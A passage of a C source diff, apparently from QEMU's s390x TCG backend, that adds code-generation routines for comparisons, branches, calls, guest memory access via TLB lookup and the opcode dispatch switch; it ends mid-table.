case TCG_COND_LT: + /* Swap operands so that we can use GEU/GTU/GT. */ + if (c2const) { + tcg_out_movi(s, type, TCG_TMP0, c2); + c2 = c1; + c2const = 0; + c1 = TCG_TMP0; + } else { + TCGReg t = c1; + c1 = c2; + c2 = t; + } + if (cond == TCG_COND_LEU) { + goto do_geu; + } + cond = tcg_swap_cond(cond); + goto do_greater; + + case TCG_COND_NE: + /* X != 0 is X > 0. */ + if (c2const && c2 == 0) { + cond = TCG_COND_GTU; + goto do_greater; + } + break; + + case TCG_COND_EQ: + /* X == 0 is X <= 0 is 0 >= X. */ + if (c2const && c2 == 0) { + tcg_out_movi(s, TCG_TYPE_I64, TCG_TMP0, 0); + c2 = c1; + c2const = 0; + c1 = TCG_TMP0; + goto do_geu; + } + break; + + default: + break; + } + + cc = tgen_cmp(s, type, cond, c1, c2, c2const); + if (facilities & FACILITY_LOAD_ON_COND) { + /* Emit: d = 0, t = 1, d = (cc ? t : d). */ + tcg_out_movi(s, TCG_TYPE_I64, dest, 0); + tcg_out_movi(s, TCG_TYPE_I64, TCG_TMP0, 1); + tcg_out_insn(s, RRF, LOCGR, dest, TCG_TMP0, cc); + } else { + /* Emit: d = 1; if (cc) goto over; d = 0; over: */ + tcg_out_movi(s, type, dest, 1); + tcg_out_insn(s, RI, BRC, cc, (4 + 4) >> 1); + tcg_out_movi(s, type, dest, 0); + } +} + +static void tgen_movcond(TCGContext *s, TCGType type, TCGCond c, TCGReg dest, + TCGReg c1, TCGArg c2, int c2const, TCGReg r3) +{ + int cc; + if (facilities & FACILITY_LOAD_ON_COND) { + cc = tgen_cmp(s, type, c, c1, c2, c2const); + tcg_out_insn(s, RRF, LOCGR, dest, r3, cc); + } else { + c = tcg_invert_cond(c); + cc = tgen_cmp(s, type, c, c1, c2, c2const); + + /* Emit: if (cc) goto over; dest = r3; over: */ + tcg_out_insn(s, RI, BRC, cc, (4 + 4) >> 1); + tcg_out_insn(s, RRE, LGR, dest, r3); + } +} + +bool tcg_target_deposit_valid(int ofs, int len) +{ + return (facilities & FACILITY_GEN_INST_EXT) != 0; +} + +static void tgen_deposit(TCGContext *s, TCGReg dest, TCGReg src, + int ofs, int len) +{ + int lsb = (63 - ofs); + int msb = lsb - (len - 1); + tcg_out_risbg(s, dest, src, msb, lsb, ofs, 0); +} + +static void tgen_gotoi(TCGContext *s, int cc, tcg_insn_unit *dest) +{ + ptrdiff_t off = dest - s->code_ptr; + if (off == (int16_t)off) { + tcg_out_insn(s, RI, BRC, cc, off); + } else if (off == (int32_t)off) { + tcg_out_insn(s, RIL, BRCL, cc, off); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, (uintptr_t)dest); + tcg_out_insn(s, RR, BCR, cc, TCG_TMP0); + } +} + +static void tgen_branch(TCGContext *s, int cc, int labelno) +{ + TCGLabel* l = &s->labels[labelno]; + if (l->has_value) { + tgen_gotoi(s, cc, l->u.value_ptr); + } else if (USE_LONG_BRANCHES) { + tcg_out16(s, RIL_BRCL | (cc << 4)); + tcg_out_reloc(s, s->code_ptr, R_390_PC32DBL, labelno, -2); + s->code_ptr += 2; + } else { + tcg_out16(s, RI_BRC | (cc << 4)); + tcg_out_reloc(s, s->code_ptr, R_390_PC16DBL, labelno, -2); + s->code_ptr += 1; + } +} + +static void tgen_compare_branch(TCGContext *s, S390Opcode opc, int cc, + TCGReg r1, TCGReg r2, int labelno) +{ + TCGLabel* l = &s->labels[labelno]; + intptr_t off; + + if (l->has_value) { + off = l->u.value_ptr - s->code_ptr; + } else { + /* We need to keep the offset unchanged for retranslation. */ + off = s->code_ptr[1]; + tcg_out_reloc(s, s->code_ptr + 1, R_390_PC16DBL, labelno, -2); + } + + tcg_out16(s, (opc & 0xff00) | (r1 << 4) | r2); + tcg_out16(s, off); + tcg_out16(s, cc << 12 | (opc & 0xff)); +} + +static void tgen_compare_imm_branch(TCGContext *s, S390Opcode opc, int cc, + TCGReg r1, int i2, int labelno) +{ + TCGLabel* l = &s->labels[labelno]; + tcg_target_long off; + + if (l->has_value) { + off = l->u.value_ptr - s->code_ptr; + } else { + /* We need to keep the offset unchanged for retranslation. */ + off = s->code_ptr[1]; + tcg_out_reloc(s, s->code_ptr + 1, R_390_PC16DBL, labelno, -2); + } + + tcg_out16(s, (opc & 0xff00) | (r1 << 4) | cc); + tcg_out16(s, off); + tcg_out16(s, (i2 << 8) | (opc & 0xff)); +} + +static void tgen_brcond(TCGContext *s, TCGType type, TCGCond c, + TCGReg r1, TCGArg c2, int c2const, int labelno) +{ + int cc; + + if (facilities & FACILITY_GEN_INST_EXT) { + bool is_unsigned = is_unsigned_cond(c); + bool in_range; + S390Opcode opc; + + cc = tcg_cond_to_s390_cond[c]; + + if (!c2const) { + opc = (type == TCG_TYPE_I32 + ? (is_unsigned ? RIE_CLRJ : RIE_CRJ) + : (is_unsigned ? RIE_CLGRJ : RIE_CGRJ)); + tgen_compare_branch(s, opc, cc, r1, c2, labelno); + return; + } + + /* COMPARE IMMEDIATE AND BRANCH RELATIVE has an 8-bit immediate field. + If the immediate we've been given does not fit that range, we'll + fall back to separate compare and branch instructions using the + larger comparison range afforded by COMPARE IMMEDIATE. */ + if (type == TCG_TYPE_I32) { + if (is_unsigned) { + opc = RIE_CLIJ; + in_range = (uint32_t)c2 == (uint8_t)c2; + } else { + opc = RIE_CIJ; + in_range = (int32_t)c2 == (int8_t)c2; + } + } else { + if (is_unsigned) { + opc = RIE_CLGIJ; + in_range = (uint64_t)c2 == (uint8_t)c2; + } else { + opc = RIE_CGIJ; + in_range = (int64_t)c2 == (int8_t)c2; + } + } + if (in_range) { + tgen_compare_imm_branch(s, opc, cc, r1, c2, labelno); + return; + } + } + + cc = tgen_cmp(s, type, c, r1, c2, c2const); + tgen_branch(s, cc, labelno); +} + +static void tcg_out_call(TCGContext *s, tcg_insn_unit *dest) +{ + ptrdiff_t off = dest - s->code_ptr; + if (off == (int32_t)off) { + tcg_out_insn(s, RIL, BRASL, TCG_REG_R14, off); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, (uintptr_t)dest); + tcg_out_insn(s, RR, BASR, TCG_REG_R14, TCG_TMP0); + } +} + +static void tcg_out_qemu_ld_direct(TCGContext *s, TCGMemOp opc, TCGReg data, + TCGReg base, TCGReg index, int disp) +{ + switch (opc) { + case MO_UB: + tcg_out_insn(s, RXY, LLGC, data, base, index, disp); + break; + case MO_SB: + tcg_out_insn(s, RXY, LGB, data, base, index, disp); + break; + + case MO_UW | MO_BSWAP: + /* swapped unsigned halfword load with upper bits zeroed */ + tcg_out_insn(s, RXY, LRVH, data, base, index, disp); + tgen_ext16u(s, TCG_TYPE_I64, data, data); + break; + case MO_UW: + tcg_out_insn(s, RXY, LLGH, data, base, index, disp); + break; + + case MO_SW | MO_BSWAP: + /* swapped sign-extended halfword load */ + tcg_out_insn(s, RXY, LRVH, data, base, index, disp); + tgen_ext16s(s, TCG_TYPE_I64, data, data); + break; + case MO_SW: + tcg_out_insn(s, RXY, LGH, data, base, index, disp); + break; + + case MO_UL | MO_BSWAP: + /* swapped unsigned int load with upper bits zeroed */ + tcg_out_insn(s, RXY, LRV, data, base, index, disp); + tgen_ext32u(s, data, data); + break; + case MO_UL: + tcg_out_insn(s, RXY, LLGF, data, base, index, disp); + break; + + case MO_SL | MO_BSWAP: + /* swapped sign-extended int load */ + tcg_out_insn(s, RXY, LRV, data, base, index, disp); + tgen_ext32s(s, data, data); + break; + case MO_SL: + tcg_out_insn(s, RXY, LGF, data, base, index, disp); + break; + + case MO_Q | MO_BSWAP: + tcg_out_insn(s, RXY, LRVG, data, base, index, disp); + break; + case MO_Q: + tcg_out_insn(s, RXY, LG, data, base, index, disp); + break; + + default: + tcg_abort(); + } +} + +static void tcg_out_qemu_st_direct(TCGContext *s, TCGMemOp opc, TCGReg data, + TCGReg base, TCGReg index, int disp) +{ + switch (opc) { + case MO_UB: + if (disp >= 0 && disp < 0x1000) { + tcg_out_insn(s, RX, STC, data, base, index, disp); + } else { + tcg_out_insn(s, RXY, STCY, data, base, index, disp); + } + break; + + case MO_UW | MO_BSWAP: + tcg_out_insn(s, RXY, STRVH, data, base, index, disp); + break; + case MO_UW: + if (disp >= 0 && disp < 0x1000) { + tcg_out_insn(s, RX, STH, data, base, index, disp); + } else { + tcg_out_insn(s, RXY, STHY, data, base, index, disp); + } + break; + + case MO_UL | MO_BSWAP: + tcg_out_insn(s, RXY, STRV, data, base, index, disp); + break; + case MO_UL: + if (disp >= 0 && disp < 0x1000) { + tcg_out_insn(s, RX, ST, data, base, index, disp); + } else { + tcg_out_insn(s, RXY, STY, data, base, index, disp); + } + break; + + case MO_Q | MO_BSWAP: + tcg_out_insn(s, RXY, STRVG, data, base, index, disp); + break; + case MO_Q: + tcg_out_insn(s, RXY, STG, data, base, index, disp); + break; + + default: + tcg_abort(); + } +} + +#if defined(CONFIG_SOFTMMU) +/* We're expecting to use a 20-bit signed offset on the tlb memory ops. + Using the offset of the second entry in the last tlb table ensures + that we can index all of the elements of the first entry. */ +QEMU_BUILD_BUG_ON(offsetof(CPUArchState, tlb_table[NB_MMU_MODES - 1][1]) + > 0x7ffff); + +/* Load and compare a TLB entry, leaving the flags set. Loads the TLB + addend into R2. Returns a register with the santitized guest address. */ +static TCGReg tcg_out_tlb_read(TCGContext* s, TCGReg addr_reg, TCGMemOp opc, + int mem_index, bool is_ld) +{ + TCGMemOp s_bits = opc & MO_SIZE; + uint64_t tlb_mask = TARGET_PAGE_MASK | ((1 << s_bits) - 1); + int ofs; + + if (facilities & FACILITY_GEN_INST_EXT) { + tcg_out_risbg(s, TCG_REG_R2, addr_reg, + 64 - CPU_TLB_BITS - CPU_TLB_ENTRY_BITS, + 63 - CPU_TLB_ENTRY_BITS, + 64 + CPU_TLB_ENTRY_BITS - TARGET_PAGE_BITS, 1); + tgen_andi_risbg(s, TCG_REG_R3, addr_reg, tlb_mask); + } else { + tcg_out_sh64(s, RSY_SRLG, TCG_REG_R2, addr_reg, TCG_REG_NONE, + TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); + tcg_out_movi(s, TCG_TYPE_TL, TCG_REG_R3, addr_reg); + tgen_andi(s, TCG_TYPE_I64, TCG_REG_R2, + (CPU_TLB_SIZE - 1) << CPU_TLB_ENTRY_BITS); + tgen_andi(s, TCG_TYPE_TL, TCG_REG_R3, tlb_mask); + } + + if (is_ld) { + ofs = offsetof(CPUArchState, tlb_table[mem_index][0].addr_read); + } else { + ofs = offsetof(CPUArchState, tlb_table[mem_index][0].addr_write); + } + if (TARGET_LONG_BITS == 32) { + tcg_out_mem(s, RX_C, RXY_CY, TCG_REG_R3, TCG_REG_R2, TCG_AREG0, ofs); + } else { + tcg_out_mem(s, 0, RXY_CG, TCG_REG_R3, TCG_REG_R2, TCG_AREG0, ofs); + } + + ofs = offsetof(CPUArchState, tlb_table[mem_index][0].addend); + tcg_out_mem(s, 0, RXY_LG, TCG_REG_R2, TCG_REG_R2, TCG_AREG0, ofs); + + if (TARGET_LONG_BITS == 32) { + tgen_ext32u(s, TCG_REG_R3, addr_reg); + return TCG_REG_R3; + } + return addr_reg; +} + +static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOp opc, + TCGReg data, TCGReg addr, int mem_index, + tcg_insn_unit *raddr, tcg_insn_unit *label_ptr) +{ + TCGLabelQemuLdst *label = new_ldst_label(s); + + label->is_ld = is_ld; + label->opc = opc; + label->datalo_reg = data; + label->addrlo_reg = addr; + label->mem_index = mem_index; + label->raddr = raddr; + label->label_ptr[0] = label_ptr; +} + +static void tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) +{ + TCGReg addr_reg = lb->addrlo_reg; + TCGReg data_reg = lb->datalo_reg; + TCGMemOp opc = lb->opc; + + patch_reloc(lb->label_ptr[0], R_390_PC16DBL, (intptr_t)s->code_ptr, -2); + + tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_R2, TCG_AREG0); + if (TARGET_LONG_BITS == 64) { + tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_R3, addr_reg); + } + tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_R4, lb->mem_index); + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R5, (uintptr_t)lb->raddr); + tcg_out_call(s, qemu_ld_helpers[opc]); + tcg_out_mov(s, TCG_TYPE_I64, data_reg, TCG_REG_R2); + + tgen_gotoi(s, S390_CC_ALWAYS, lb->raddr); +} + +static void tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) +{ + TCGReg addr_reg = lb->addrlo_reg; + TCGReg data_reg = lb->datalo_reg; + TCGMemOp opc = lb->opc; + + patch_reloc(lb->label_ptr[0], R_390_PC16DBL, (intptr_t)s->code_ptr, -2); + + tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_R2, TCG_AREG0); + if (TARGET_LONG_BITS == 64) { + tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_R3, addr_reg); + } + switch (opc & MO_SIZE) { + case MO_UB: + tgen_ext8u(s, TCG_TYPE_I64, TCG_REG_R4, data_reg); + break; + case MO_UW: + tgen_ext16u(s, TCG_TYPE_I64, TCG_REG_R4, data_reg); + break; + case MO_UL: + tgen_ext32u(s, TCG_REG_R4, data_reg); + break; + case MO_Q: + tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_R4, data_reg); + break; + default: + tcg_abort(); + } + tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_R5, lb->mem_index); + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R6, (uintptr_t)lb->raddr); + tcg_out_call(s, qemu_st_helpers[opc]); + + tgen_gotoi(s, S390_CC_ALWAYS, lb->raddr); +} +#else +static void tcg_prepare_user_ldst(TCGContext *s, TCGReg *addr_reg, + TCGReg *index_reg, tcg_target_long *disp) +{ + if (TARGET_LONG_BITS == 32) { + tgen_ext32u(s, TCG_TMP0, *addr_reg); + *addr_reg = TCG_TMP0; + } + if (GUEST_BASE < 0x80000) { + *index_reg = TCG_REG_NONE; + *disp = GUEST_BASE; + } else { + *index_reg = TCG_GUEST_BASE_REG; + *disp = 0; + } +} +#endif /* CONFIG_SOFTMMU */ + +static void tcg_out_qemu_ld(TCGContext* s, TCGReg data_reg, TCGReg addr_reg, + TCGMemOp opc, int mem_index) +{ +#ifdef CONFIG_SOFTMMU + tcg_insn_unit *label_ptr; + TCGReg base_reg; + + base_reg = tcg_out_tlb_read(s, addr_reg, opc, mem_index, 1); + + label_ptr = s->code_ptr + 1; + tcg_out_insn(s, RI, BRC, S390_CC_NE, 0); + + tcg_out_qemu_ld_direct(s, opc, data_reg, base_reg, TCG_REG_R2, 0); + + add_qemu_ldst_label(s, 1, opc, data_reg, addr_reg, mem_index, + s->code_ptr, label_ptr); +#else + TCGReg index_reg; + tcg_target_long disp; + + tcg_prepare_user_ldst(s, &addr_reg, &index_reg, &disp); + tcg_out_qemu_ld_direct(s, opc, data_reg, addr_reg, index_reg, disp); +#endif +} + +static void tcg_out_qemu_st(TCGContext* s, TCGReg data_reg, TCGReg addr_reg, + TCGMemOp opc, int mem_index) +{ +#ifdef CONFIG_SOFTMMU + tcg_insn_unit *label_ptr; + TCGReg base_reg; + + base_reg = tcg_out_tlb_read(s, addr_reg, opc, mem_index, 0); + + label_ptr = s->code_ptr + 1; + tcg_out_insn(s, RI, BRC, S390_CC_NE, 0); + + tcg_out_qemu_st_direct(s, opc, data_reg, base_reg, TCG_REG_R2, 0); + + add_qemu_ldst_label(s, 0, opc, data_reg, addr_reg, mem_index, + s->code_ptr, label_ptr); +#else + TCGReg index_reg; + tcg_target_long disp; + + tcg_prepare_user_ldst(s, &addr_reg, &index_reg, &disp); + tcg_out_qemu_st_direct(s, opc, data_reg, addr_reg, index_reg, disp); +#endif +} + +# define OP_32_64(x) \ + case glue(glue(INDEX_op_,x),_i32): \ + case glue(glue(INDEX_op_,x),_i64) + +static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, + const TCGArg *args, const int *const_args) +{ + S390Opcode op; + TCGArg a0, a1, a2; + + switch (opc) { + case INDEX_op_exit_tb: + /* return value */ + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R2, args[0]); + tgen_gotoi(s, S390_CC_ALWAYS, tb_ret_addr); + break; + + case INDEX_op_goto_tb: + if (s->tb_jmp_offset) { + tcg_out16(s, RIL_BRCL | (S390_CC_ALWAYS << 4)); + s->tb_jmp_offset[args[0]] = tcg_current_code_size(s); + s->code_ptr += 2; + } else { + /* load address stored at s->tb_next + args[0] */ + tcg_out_ld_abs(s, TCG_TYPE_PTR, TCG_TMP0, s->tb_next + args[0]); + /* and go there */ + tcg_out_insn(s, RR, BCR, S390_CC_ALWAYS, TCG_TMP0); + } + s->tb_next_offset[args[0]] = tcg_current_code_size(s); + break; + + OP_32_64(ld8u): + /* ??? LLC (RXY format) is only present with the extended-immediate + facility, whereas LLGC is always present. */ + tcg_out_mem(s, 0, RXY_LLGC, args[0], args[1], TCG_REG_NONE, args[2]); + break; + + OP_32_64(ld8s): + /* ??? LB is no smaller than LGB, so no point to using it. */ + tcg_out_mem(s, 0, RXY_LGB, args[0], args[1], TCG_REG_NONE, args[2]); + break; + + OP_32_64(ld16u): + /* ??? LLH (RXY format) is only present with the extended-immediate + facility, whereas LLGH is always present. */ + tcg_out_mem(s, 0, RXY_LLGH, args[0], args[1], TCG_REG_NONE, args[2]); + break; + + case INDEX_op_ld16s_i32: + tcg_out_mem(s, RX_LH, RXY_LHY, args[0], args[1], TCG_REG_NONE, args[2]); + break; + + case INDEX_op_ld_i32: + tcg_out_ld(s, TCG_TYPE_I32, args[0], args[1], args[2]); + break; + + OP_32_64(st8): + tcg_out_mem(s, RX_STC, RXY_STCY, args[0], args[1], + TCG_REG_NONE, args[2]); + break; + + OP_32_64(st16): + tcg_out_mem(s, RX_STH, RXY_STHY, args[0], args[1], + TCG_REG_NONE, args[2]); + break; + + case INDEX_op_st_i32: + tcg_out_st(s, TCG_TYPE_I32, args[0], args[1], args[2]); + break; + + case INDEX_op_add_i32: + a0 = args[0], a1 = args[1], a2 = (int32_t)args[2]; + if (const_args[2]) { + do_addi_32: + if (a0 == a1) { + if (a2 == (int16_t)a2) { + tcg_out_insn(s, RI, AHI, a0, a2); + break; + } + if (facilities & FACILITY_EXT_IMM) { + tcg_out_insn(s, RIL, AFI, a0, a2); + break; + } + } + tcg_out_mem(s, RX_LA, RXY_LAY, a0, a1, TCG_REG_NONE, a2); + } else if (a0 == a1) { + tcg_out_insn(s, RR, AR, a0, a2); + } else { + tcg_out_insn(s, RX, LA, a0, a1, a2, 0); + } + break; + case INDEX_op_sub_i32: + a0 = args[0], a1 = args[1], a2 = (int32_t)args[2]; + if (const_args[2]) { + a2 = -a2; + goto do_addi_32; + } + tcg_out_insn(s, RR, SR, args[0], args[2]); + break; + + case INDEX_op_and_i32: + if (const_args[2]) { + tgen_andi(s, TCG_TYPE_I32, args[0], args[2]); + } else { + tcg_out_insn(s, RR, NR, args[0], args[2]); + } + break; + case INDEX_op_or_i32: + if (const_args[2]) { + tgen64_ori(s, args[0], args[2] & 0xffffffff); + } else { + tcg_out_insn(s, RR, OR, args[0], args[2]); + } + break; + case INDEX_op_xor_i32: + if (const_args[2]) { + tgen64_xori(s, args[0], args[2] & 0xffffffff); + } else { + tcg_out_insn(s, RR, XR, args[0], args[2]); + } + break; + + case INDEX_op_neg_i32: + tcg_out_insn(s, RR, LCR, args[0], args[1]); + break; + + case INDEX_op_mul_i32: + if (const_args[2]) { + if ((int32_t)args[2] == (int16_t)args[2]) { + tcg_out_insn(s, RI, MHI, args[0], args[2]); + } else { + tcg_out_insn(s, RIL, MSFI, args[0], args[2]); + } + } else { + tcg_out_insn(s, RRE, MSR, args[0], args[2]); + } + break; + + case INDEX_op_div2_i32: + tcg_out_insn(s, RR, DR, TCG_REG_R2, args[4]); + break; + case INDEX_op_divu2_i32: + tcg_out_insn(s, RRE, DLR, TCG_REG_R2, args[4]); + break; + + case INDEX_op_shl_i32: + op = RS_SLL; + do_shift32: + if (const_args[2]) { + tcg_out_sh32(s, op, args[0], TCG_REG_NONE, args[2]); + } else { + tcg_out_sh32(s, op, args[0], args[2], 0); + } + break; + case INDEX_op_shr_i32: + op = RS_SRL; + goto do_shift32; + case INDEX_op_sar_i32: + op = RS_SRA; + goto do_shift32; + + case INDEX_op_rotl_i32: + /* ??? Using tcg_out_sh64 here for the format; it is a 32-bit rol. */ + if (const_args[2]) { + tcg_out_sh64(s, RSY_RLL, args[0], args[1], TCG_REG_NONE, args[2]); + } else { + tcg_out_sh64(s, RSY_RLL, args[0], args[1], args[2], 0); + } + break; + case INDEX_op_rotr_i32: + if (const_args[2]) { + tcg_out_sh64(s, RSY_RLL, args[0], args[1], + TCG_REG_NONE, (32 - args[2]) & 31); + } else { + tcg_out_insn(s, RR, LCR, TCG_TMP0, args[2]); + tcg_out_sh64(s, RSY_RLL, args[0], args[1], TCG_TMP0, 0); + } + break; + + case INDEX_op_ext8s_i32: + tgen_ext8s(s, TCG_TYPE_I32, args[0], args[1]); + break; + case INDEX_op_ext16s_i32: + tgen_ext16s(s, TCG_TYPE_I32, args[0], args[1]); + break; + case INDEX_op_ext8u_i32: + tgen_ext8u(s, TCG_TYPE_I32, args[0], args[1]); + break; + case INDEX_op_ext16u_i32: + tgen_ext16u(s, TCG_TYPE_I32, args[0], args[1]); + break; + + OP_32_64(bswap16): + /* The TCG bswap definition requires bits 0-47 already be zero. + Thus we don't need the G-type insns to implement bswap16_i64. */ + tcg_out_insn(s, RRE, LRVR, args[0], args[1]); + tcg_out_sh32(s, RS_SRL, args[0], TCG_REG_NONE, 16); + break; + OP_32_64(bswap32): + tcg_out_insn(s, RRE, LRVR, args[0], args[1]); + break; + + case INDEX_op_add2_i32: + if (const_args[4]) { + tcg_out_insn(s, RIL, ALFI, args[0], args[4]); + } else { + tcg_out_insn(s, RR, ALR, args[0], args[4]); + } + tcg_out_insn(s, RRE, ALCR, args[1], args[5]); + break; + case INDEX_op_sub2_i32: + if (const_args[4]) { + tcg_out_insn(s, RIL, SLFI, args[0], args[4]); + } else { + tcg_out_insn(s, RR, SLR, args[0], args[4]); + } + tcg_out_insn(s, RRE, SLBR, args[1], args[5]); + break; + + case INDEX_op_br: + tgen_branch(s, S390_CC_ALWAYS, args[0]); + break; + + case INDEX_op_brcond_i32: + tgen_brcond(s, TCG_TYPE_I32, args[2], args[0], + args[1], const_args[1], args[3]); + break; + case INDEX_op_setcond_i32: + tgen_setcond(s, TCG_TYPE_I32, args[3], args[0], args[1], + args[2], const_args[2]); + break; + case INDEX_op_movcond_i32: + tgen_movcond(s, TCG_TYPE_I32, args[5], args[0], args[1], + args[2], const_args[2], args[3]); + break; + + case INDEX_op_qemu_ld_i32: + /* ??? Technically we can use a non-extending instruction. */ + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, args[0], args[1], args[2], args[3]); + break; + case INDEX_op_qemu_st_i32: + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, args[0], args[1], args[2], args[3]); + break; + + case INDEX_op_ld16s_i64: + tcg_out_mem(s, 0, RXY_LGH, args[0], args[1], TCG_REG_NONE, args[2]); + break; + case INDEX_op_ld32u_i64: + tcg_out_mem(s, 0, RXY_LLGF, args[0], args[1], TCG_REG_NONE, args[2]); + break; + case INDEX_op_ld32s_i64: + tcg_out_mem(s, 0, RXY_LGF, args[0], args[1], TCG_REG_NONE, args[2]); + break; + case INDEX_op_ld_i64: + tcg_out_ld(s, TCG_TYPE_I64, args[0], args[1], args[2]); + break; + + case INDEX_op_st32_i64: + tcg_out_st(s, TCG_TYPE_I32, args[0], args[1], args[2]); + break; + case INDEX_op_st_i64: + tcg_out_st(s, TCG_TYPE_I64, args[0], args[1], args[2]); + break; + + case INDEX_op_add_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + do_addi_64: + if (a0 == a1) { + if (a2 == (int16_t)a2) { + tcg_out_insn(s, RI, AGHI, a0, a2); + break; + } + if (facilities & FACILITY_EXT_IMM) { + if (a2 == (int32_t)a2) { + tcg_out_insn(s, RIL, AGFI, a0, a2); + break; + } else if (a2 == (uint32_t)a2) { + tcg_out_insn(s, RIL, ALGFI, a0, a2); + break; + } else if (-a2 == (uint32_t)-a2) { + tcg_out_insn(s, RIL, SLGFI, a0, -a2); + break; + } + } + } + tcg_out_mem(s, RX_LA, RXY_LAY, a0, a1, TCG_REG_NONE, a2); + } else if (a0 == a1) { + tcg_out_insn(s, RRE, AGR, a0, a2); + } else { + tcg_out_insn(s, RX, LA, a0, a1, a2, 0); + } + break; + case INDEX_op_sub_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + a2 = -a2; + goto do_addi_64; + } else { + tcg_out_insn(s, RRE, SGR, args[0], args[2]); + } + break; + + case INDEX_op_and_i64: + if (const_args[2]) { + tgen_andi(s, TCG_TYPE_I64, args[0], args[2]); + } else { + tcg_out_insn(s, RRE, NGR, args[0], args[2]); + } + break; + case INDEX_op_or_i64: + if (const_args[2]) { + tgen64_ori(s, args[0], args[2]); + } else { + tcg_out_insn(s, RRE, OGR, args[0], args[2]); + } + break; + case INDEX_op_xor_i64: + if (const_args[2]) { + tgen64_xori(s, args[0], args[2]); + } else { + tcg_out_insn(s, RRE, XGR, args[0], args[2]); + } + break; + + case INDEX_op_neg_i64: + tcg_out_insn(s, RRE, LCGR, args[0], args[1]); + break; + case INDEX_op_bswap64_i64: + tcg_out_insn(s, RRE, LRVGR, args[0], args[1]); + break; + + case INDEX_op_mul_i64: + if (const_args[2]) { + if (args[2] == (int16_t)args[2]) { + tcg_out_insn(s, RI, MGHI, args[0], args[2]); + } else { + tcg_out_insn(s, RIL, MSGFI, args[0], args[2]); + } + } else { + tcg_out_insn(s, RRE, MSGR, args[0], args[2]); + } + break; + + case INDEX_op_div2_i64: + /* ??? We get an unnecessary sign-extension of the dividend + into R3 with this definition, but as we do in fact always + produce both quotient and remainder using INDEX_op_div_i64 + instead requires jumping through even more hoops. */ + tcg_out_insn(s, RRE, DSGR, TCG_REG_R2, args[4]); + break; + case INDEX_op_divu2_i64: + tcg_out_insn(s, RRE, DLGR, TCG_REG_R2, args[4]); + break; + case INDEX_op_mulu2_i64: + tcg_out_insn(s, RRE, MLGR, TCG_REG_R2, args[3]); + break; + + case INDEX_op_shl_i64: + op = RSY_SLLG; + do_shift64: + if (const_args[2]) { + tcg_out_sh64(s, op, args[0], args[1], TCG_REG_NONE, args[2]); + } else { + tcg_out_sh64(s, op, args[0], args[1], args[2], 0); + } + break; + case INDEX_op_shr_i64: + op = RSY_SRLG; + goto do_shift64; + case INDEX_op_sar_i64: + op = RSY_SRAG; + goto do_shift64; + + case INDEX_op_rotl_i64: + if (const_args[2]) { + tcg_out_sh64(s, RSY_RLLG, args[0], args[1], + TCG_REG_NONE, args[2]); + } else { + tcg_out_sh64(s, RSY_RLLG, args[0], args[1], args[2], 0); + } + break; + case INDEX_op_rotr_i64: + if (const_args[2]) { + tcg_out_sh64(s, RSY_RLLG, args[0], args[1], + TCG_REG_NONE, (64 - args[2]) & 63); + } else { + /* We can use the smaller 32-bit negate because only the + low 6 bits are examined for the rotate. */ + tcg_out_insn(s, RR, LCR, TCG_TMP0, args[2]); + tcg_out_sh64(s, RSY_RLLG, args[0], args[1], TCG_TMP0, 0); + } + break; + + case INDEX_op_ext8s_i64: + tgen_ext8s(s, TCG_TYPE_I64, args[0], args[1]); + break; + case INDEX_op_ext16s_i64: + tgen_ext16s(s, TCG_TYPE_I64, args[0], args[1]); + break; + case INDEX_op_ext32s_i64: + tgen_ext32s(s, args[0], args[1]); + break; + case INDEX_op_ext8u_i64: + tgen_ext8u(s, TCG_TYPE_I64, args[0], args[1]); + break; + case INDEX_op_ext16u_i64: + tgen_ext16u(s, TCG_TYPE_I64, args[0], args[1]); + break; + case INDEX_op_ext32u_i64: + tgen_ext32u(s, args[0], args[1]); + break; + + case INDEX_op_add2_i64: + if (const_args[4]) { + if ((int64_t)args[4] >= 0) { + tcg_out_insn(s, RIL, ALGFI, args[0], args[4]); + } else { + tcg_out_insn(s, RIL, SLGFI, args[0], -args[4]); + } + } else { + tcg_out_insn(s, RRE, ALGR, args[0], args[4]); + } + tcg_out_insn(s, RRE, ALCGR, args[1], args[5]); + break; + case INDEX_op_sub2_i64: + if (const_args[4]) { + if ((int64_t)args[4] >= 0) { + tcg_out_insn(s, RIL, SLGFI, args[0], args[4]); + } else { + tcg_out_insn(s, RIL, ALGFI, args[0], -args[4]); + } + } else { + tcg_out_insn(s, RRE, SLGR, args[0], args[4]); + } + tcg_out_insn(s, RRE, SLBGR, args[1], args[5]); + break; + + case INDEX_op_brcond_i64: + tgen_brcond(s, TCG_TYPE_I64, args[2], args[0], + args[1], const_args[1], args[3]); + break; + case INDEX_op_setcond_i64: + tgen_setcond(s, TCG_TYPE_I64, args[3], args[0], args[1], + args[2], const_args[2]); + break; + case INDEX_op_movcond_i64: + tgen_movcond(s, TCG_TYPE_I64, args[5], args[0], args[1], + args[2], const_args[2], args[3]); + break; + + OP_32_64(deposit): + tgen_deposit(s, args[0], args[2], args[3], args[4]); + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_mov_i64: + case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ + case INDEX_op_movi_i64: + case INDEX_op_call: /* Always emitted via tcg_out_call. */ + default: + tcg_abort(); + } +} + +static const TCGTargetOpDef s390_op_defs[] = { + { INDEX_op_exit_tb, { } }, + { INDEX_op_goto_tb, { } }, + { INDEX_op_br, { } 